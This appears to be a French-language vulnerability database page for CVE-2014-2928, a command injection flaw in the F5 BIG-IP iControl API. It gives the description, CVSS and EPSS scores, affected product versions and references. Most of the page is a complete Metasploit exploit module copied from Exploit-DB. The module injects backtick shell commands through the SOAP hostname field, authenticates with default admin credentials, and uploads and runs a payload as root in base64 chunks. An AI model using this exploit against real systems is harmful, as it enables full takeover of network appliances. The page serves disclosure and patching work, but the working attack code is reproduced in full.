CVE-2014-2928 : Détail

CVE-2014-2928

68.27%V3
Network
2014-05-12
12h00 +00:00
2014-11-14
13h57 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The iControl API in F5 BIG-IP LTM, APM, ASM, GTM, Link Controller, and PSM 10.0.0 through 10.2.4 and 11.0.0 through 11.5.1, BIG-IP AAM 11.4.0 through 11.5.1, BIG-IP AFM and PEM 11.3.0 through 11.5.1, BIG-IP Analytics 11.0.0 through 11.5.1, BIG-IP Edge Gateway, WebAccelerator, WOM 10.1.0 through 10.2.4 and 11.0.0 through 11.3.0, Enterprise Manager 2.1.0 through 2.3.0 and 3.0.0 through 3.1.1, and BIG-IQ Cloud, Device, and Security 4.0.0 through 4.3.0 allows remote administrators to execute arbitrary commands via shell metacharacters in the hostname element in a SOAP request.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.1 AV:N/AC:H/Au:S/C:C/I:C/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 34927

Date de publication : 2014-10-08 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "F5 iControl Remote Root Command Execution", 'Description' => %q{ This module exploits an authenticated remote command execution vulnerability in the F5 BIGIP iControl API (and likely other F5 devices). }, 'License' => MSF_LICENSE, 'Author' => [ 'bperry' # Discovery, Metasploit module ], 'References' => [ ['CVE', '2014-2928'], ['URL', 'http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html'] ], 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Targets' => [ ['F5 iControl', {}] ], 'Privileged' => true, 'DisclosureDate' => "Sep 17 2013", 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(443), OptBool.new('SSL', [true, 'Use SSL', true]), OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/']), OptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']), OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin']) ], self.class) end def check get_hostname = %Q{<?xml version="1.0" encoding="ISO-8859-1"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Body> <n1:get_hostname xmlns:n1="urn:iControl:System/Inet" /> </SOAP-ENV:Body> </SOAP-ENV:Envelope> } res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'), 'method' => 'POST', 'data' => get_hostname, 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] }) res.body =~ /y:string">(.*)<\/return/ hostname = $1 send_cmd("whoami") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'), 'method' => 'POST', 'data' => get_hostname, 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] }) res.body =~ /y:string">(.*)<\/return/ new_hostname = $1 if new_hostname == "root.a.b" pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Body> <n1:set_hostname xmlns:n1="urn:iControl:System/Inet"> <hostname>#{hostname}</hostname> </n1:set_hostname> </SOAP-ENV:Body> </SOAP-ENV:Envelope> } send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'), 'method' => 'POST', 'data' => pay, 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] }) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def send_cmd(cmd) pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Body> <n1:set_hostname xmlns:n1="urn:iControl:System/Inet"> <hostname>`#{cmd}`.a.b</hostname> </n1:set_hostname> </SOAP-ENV:Body> </SOAP-ENV:Envelope> } send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'), 'method' => 'POST', 'data' => pay, 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] }) end def exploit filename = Rex::Text.rand_text_alpha_lower(5) print_status('Sending payload in chunks, might take a small bit...') i = 0 while i < payload.encoded.length cmd = "echo #{Rex::Text.encode_base64(payload.encoded[i..i+4])}|base64 --decode|tee -a /tmp/#{filename}" send_cmd(cmd) i = i + 5 end print_status('Triggering payload...') send_cmd("sh /tmp/#{filename}") end end

Products Mentioned

Configuraton 0

F5>>Big-ip_webaccelerator >> Version 9.4.0

F5>>Big-ip_webaccelerator >> Version 9.4.1

F5>>Big-ip_webaccelerator >> Version 9.4.2

F5>>Big-ip_webaccelerator >> Version 9.4.3

F5>>Big-ip_webaccelerator >> Version 9.4.4

F5>>Big-ip_webaccelerator >> Version 9.4.5

F5>>Big-ip_webaccelerator >> Version 9.4.6

F5>>Big-ip_webaccelerator >> Version 9.4.7

F5>>Big-ip_webaccelerator >> Version 9.4.8

F5>>Big-ip_webaccelerator >> Version 10.0.0

F5>>Big-ip_webaccelerator >> Version 10.0.1

F5>>Big-ip_webaccelerator >> Version 10.1.0

F5>>Big-ip_webaccelerator >> Version 10.2.0

F5>>Big-ip_webaccelerator >> Version 10.2.1

F5>>Big-ip_webaccelerator >> Version 10.2.2

F5>>Big-ip_webaccelerator >> Version 10.2.3

F5>>Big-ip_webaccelerator >> Version 10.2.4

F5>>Big-ip_webaccelerator >> Version 11.0.0

F5>>Big-ip_webaccelerator >> Version 11.1.0

F5>>Big-ip_webaccelerator >> Version 11.2.0

F5>>Big-ip_webaccelerator >> Version 11.2.1

F5>>Big-ip_webaccelerator >> Version 11.3.0

Configuraton 0

F5>>Big-ip_local_traffic_manager >> Version 10.0.0

F5>>Big-ip_local_traffic_manager >> Version 10.0.1

F5>>Big-ip_local_traffic_manager >> Version 10.1.0

F5>>Big-ip_local_traffic_manager >> Version 10.2.0

F5>>Big-ip_local_traffic_manager >> Version 10.2.1

F5>>Big-ip_local_traffic_manager >> Version 10.2.2

F5>>Big-ip_local_traffic_manager >> Version 11.0.0

Configuraton 0

F5>>Big-ip_protocol_security_module >> Version 9.4.5

F5>>Big-ip_protocol_security_module >> Version 9.4.6

F5>>Big-ip_protocol_security_module >> Version 9.4.7

F5>>Big-ip_protocol_security_module >> Version 9.4.8

F5>>Big-ip_protocol_security_module >> Version 10.0.0

F5>>Big-ip_protocol_security_module >> Version 10.0.1

F5>>Big-ip_protocol_security_module >> Version 10.1.0

F5>>Big-ip_protocol_security_module >> Version 10.2.0

F5>>Big-ip_protocol_security_module >> Version 10.2.1

F5>>Big-ip_protocol_security_module >> Version 10.2.2

F5>>Big-ip_protocol_security_module >> Version 10.2.3

F5>>Big-ip_protocol_security_module >> Version 10.2.4

F5>>Big-ip_protocol_security_module >> Version 11.0.0

F5>>Big-ip_protocol_security_module >> Version 11.1.0

F5>>Big-ip_protocol_security_module >> Version 11.2.0

F5>>Big-ip_protocol_security_module >> Version 11.2.1

F5>>Big-ip_protocol_security_module >> Version 11.3.0

F5>>Big-ip_protocol_security_module >> Version 11.4.0

F5>>Big-ip_protocol_security_module >> Version 11.4.1

Configuraton 0

F5>>Big-ip_link_controller >> Version 10.0.0

F5>>Big-ip_link_controller >> Version 10.0.1

F5>>Big-ip_link_controller >> Version 10.1.0

F5>>Big-ip_link_controller >> Version 10.2.0

F5>>Big-ip_link_controller >> Version 10.2.1

F5>>Big-ip_link_controller >> Version 10.2.2

F5>>Big-ip_link_controller >> Version 11.0.0

Configuraton 0

F5>>Big-ip_application_security_manager >> Version 10.0.0

F5>>Big-ip_application_security_manager >> Version 10.0.1

F5>>Big-ip_application_security_manager >> Version 10.1.0

F5>>Big-ip_application_security_manager >> Version 10.2.0

F5>>Big-ip_application_security_manager >> Version 10.2.1

F5>>Big-ip_application_security_manager >> Version 10.2.2

F5>>Big-ip_application_security_manager >> Version 11.0.0

Configuraton 0

F5>>Big-ip_global_traffic_manager >> Version 10.0.0

F5>>Big-ip_global_traffic_manager >> Version 10.0.1

F5>>Big-ip_global_traffic_manager >> Version 10.1.0

F5>>Big-ip_global_traffic_manager >> Version 10.2.0

F5>>Big-ip_global_traffic_manager >> Version 10.2.1

F5>>Big-ip_global_traffic_manager >> Version 10.2.2

F5>>Big-ip_global_traffic_manager >> Version 11.0.0

Configuraton 0

F5>>Big-ip_wan_optimization_manager >> Version 10.0.0

F5>>Big-ip_wan_optimization_manager >> Version 10.0.1

F5>>Big-ip_wan_optimization_manager >> Version 10.1.0

F5>>Big-ip_wan_optimization_manager >> Version 10.2.0

F5>>Big-ip_wan_optimization_manager >> Version 10.2.1

F5>>Big-ip_wan_optimization_manager >> Version 10.2.2

F5>>Big-ip_wan_optimization_manager >> Version 11.0.0

Configuraton 0

F5>>Big-ip_access_policy_manager >> Version 10.1.0

F5>>Big-ip_access_policy_manager >> Version 10.2.0

F5>>Big-ip_access_policy_manager >> Version 10.2.1

F5>>Big-ip_access_policy_manager >> Version 10.2.2

F5>>Big-ip_access_policy_manager >> Version 11.0.0

Configuraton 0

F5>>Big-ip_edge_gateway >> Version 10.1.0

F5>>Big-ip_edge_gateway >> Version 10.2.0

F5>>Big-ip_edge_gateway >> Version 10.2.1

F5>>Big-ip_edge_gateway >> Version 10.2.2

F5>>Big-ip_edge_gateway >> Version 11.0.0

Références

http://seclists.org/fulldisclosure/2014/May/32
Tags : mailing-list, x_refsource_FULLDISC
http://www.exploit-db.com/exploits/34927
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.osvdb.org/106728
Tags : vdb-entry, x_refsource_OSVDB